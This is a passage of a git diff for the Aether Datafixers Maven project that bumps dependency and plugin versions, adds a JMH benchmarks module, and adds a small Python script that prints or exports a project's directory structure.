     <groupId>de.splatgames.aether.datafixers</groupId>
     <artifactId>aether-datafixers</artifactId>
-    <version>0.5.0</version>
+    <version>1.0.0-SNAPSHOT</version>
     <packaging>pom</packaging>
 
         <module>aether-datafixers-api</module>
@@ -19,6 +19,7 @@
         <module>aether-datafixers-examples</module>
         <module>aether-datafixers-bom</module>
         <module>aether-datafixers-functional-tests</module>
+        <module>aether-datafixers-benchmarks</module>
@@ -31,25 +32,25 @@
         true
 
-        26.0.2
+        26.0.2-1
         2.13.2
-        2.19.0
+        2.21.0
         33.5.0-jre
         5.13.4
-        3.27.6
+        3.27.7
         2.0.17
         4.9.8
 
-        3.11.0
-        3.4.1
-        3.3.1
-        3.10.1
-        3.20.0
-        3.2.6
-        3.1.2
-        3.1.2
-        3.5.1
+        3.14.1
+        3.6.2
+        3.4.0
+        3.12.0
+        3.21.0
+        3.2.8
+        3.5.4
+        3.5.4
+        3.6.1
 
         0.8.14
@@ -63,10 +64,13 @@
         0.75
 
-        4.7.6
+        4.7.7
 
-        2.2
+        2.5
+
+        <jmh.version>1.37</jmh.version>
 
     <name>Aether Datafixers :: Parent</name>
@@ -213,6 +217,18 @@
                 <version>${spotbugs.version}</version>
                 <scope>provided</scope>
             </dependency>
+
+            <dependency>
+                <groupId>org.openjdk.jmh</groupId>
+                <artifactId>jmh-core</artifactId>
+                <version>${jmh.version}</version>
+            </dependency>
+            <dependency>
+                <groupId>org.openjdk.jmh</groupId>
+                <artifactId>jmh-generator-annprocess</artifactId>
+                <version>${jmh.version}</version>
+                <scope>provided</scope>
+            </dependency>
@@ -313,7 +329,7 @@
                 <groupId>org.sonatype.central</groupId>
                 <artifactId>central-publishing-maven-plugin</artifactId>
-                <version>0.8.0</version>
+                <version>0.10.0</version>
                 true
                 central
diff --git a/scripts/structure.py b/scripts/structure.py
new file mode 100644
index 0000000..fdf1d0f
--- /dev/null
+++ b/scripts/structure.py
@@ -0,0 +1,104 @@
+import os
+import fnmatch
+import argparse
+
+def apply_color(text, color_code, use_colors):
+    return f"\033[{color_code}m{text}\033[0m" if use_colors else text
+
+def print_structure(dir_path, depth, file_pattern, use_colors, excluded_folders):
+    try:
+        entries = os.listdir(dir_path)
+    except Exception:
+        # Unreadable directory (permissions, broken symlink): skip it silently
+        return
+
+    if not entries:
+        return
+
+    full_paths = [os.path.join(dir_path, entry) for entry in entries]
+    # Directories first, then files, each group sorted alphabetically
+    full_paths.sort(key=lambda p: (os.path.isfile(p), os.path.basename(p).lower()))
+
+    for path in full_paths:
+        name = os.path.basename(path)
+        if name in {".", ".."} or name in excluded_folders:
+            continue
+        indent = " " * (depth * 4)
+        if os.path.isdir(path):
+            print(f"{indent}" + apply_color(f"📁 {name}", "34", use_colors))
+            print_structure(path, depth + 1, file_pattern, use_colors, excluded_folders)
+        elif fnmatch.fnmatch(name, file_pattern):
+            print(f"{indent} " + apply_color(f"📄 {name}", "32", use_colors))
+
+def print_dependency_tree(dir_path, depth=0, file_pattern="*.java", use_colors=True, excluded_folders=frozenset()):
+    try:
+        entries = os.listdir(dir_path)
+    except Exception:
+        return
+
+    entries.sort()
+    for entry in entries:
+        full_path = os.path.join(dir_path, entry)
+        if entry in excluded_folders or entry in {".", ".."}:
+            continue
+        indent = "| " * depth + "|-- "
+        if os.path.isdir(full_path):
+            print(indent + apply_color(f"{entry}/", "34", use_colors))
+            print_dependency_tree(full_path, depth + 1, file_pattern, use_colors, excluded_folders)
+        elif fnmatch.fnmatch(entry, file_pattern):
+            print(indent + apply_color(entry, "32", use_colors))
+
+def export_structure_to_file(output_file, mode, file_pattern, root_path, excluded_folders):
+    with open(output_file, "w", encoding="utf-8") as f:
+        def write_structure(dir_path, depth):
+            try:
+                entries = os.listdir(dir_path)
+            except Exception:
+                return
+
+            entries.sort()
+            for entry in entries:
+                full_path = os.path.join(dir_path, entry)
+                if entry in excluded_folders or entry in {".", ".."}:
+                    continue
+                indent = "  " * depth
+                if os.path.isdir(full_path):
+                    f.write(f"{indent}{entry}/\n")
+                    write_structure(full_path, depth + 1)
+                elif fnmatch.fnmatch(entry, file_pattern):
+                    f.write(f"{indent}{entry}\n")
+
+        f.write("Package Structure:\n")
+        # Both modes currently share the same flat layout in the exported file
+        f.write(f"ROOT ({root_path})\n")
+        write_structure(root_path, 1)
+
+def print_package_structure(root_path, mode="default", file_pattern="*.java", output_file=None, use_colors=True, excluded_folders=frozenset()):
+    # os.path.isdir() is False for missing paths, so a single check covers both cases
+    if not os.path.isdir(root_path):
+        print("❌ Root directory does not exist: " + root_path)
+        return
+
+    print(f"\n📂 Package Structure ({root_path}):")
+    if mode == "tree":
+        print("|-- ROOT")
+        print_dependency_tree(root_path, 1, file_pattern, use_colors, excluded_folders)
+    else:
+        print("📁 ROOT")
+        print_structure(root_path, 1, file_pattern, use_colors, excluded_folders)
+
+    if output_file:
+        export_structure_to_file(output_file, mode, file_pattern, root_path, excluded_folders)
+        print(f"\n✅ Structure exported to {output_file}")
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Print the package structure of a Java project.")
+    parser.add_argument("root_path", type=str, help="Root directory of the project")
+    parser.add_argument("mode", nargs="?", choices=["default", "tree"], default="default", help="Output mode")
+    parser.add_argument("--filter", type=str, default="*.java", help="Filter files by wildcard pattern (e.g., '*.java')")
+    parser.add_argument("--output", type=str, help="Export output to a file")
+    parser.add_argument("--no-color", action="store_true", help="Disable colored output")
+    parser.add_argument("--exclude", type=str, nargs="*", default=["target", "build", ".git", "node_modules"], help="Folders to exclude")
+
+    args = parser.parse_args()
+    print_package_structure(args.root_path, args.mode, args.filter, args.output, not args.no_color, set(args.exclude))
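+
+# Example invocation (the path and flag values shown are illustrative):
+#   python scripts/structure.py . tree --filter "*.java" --exclude target .git --output structure.txt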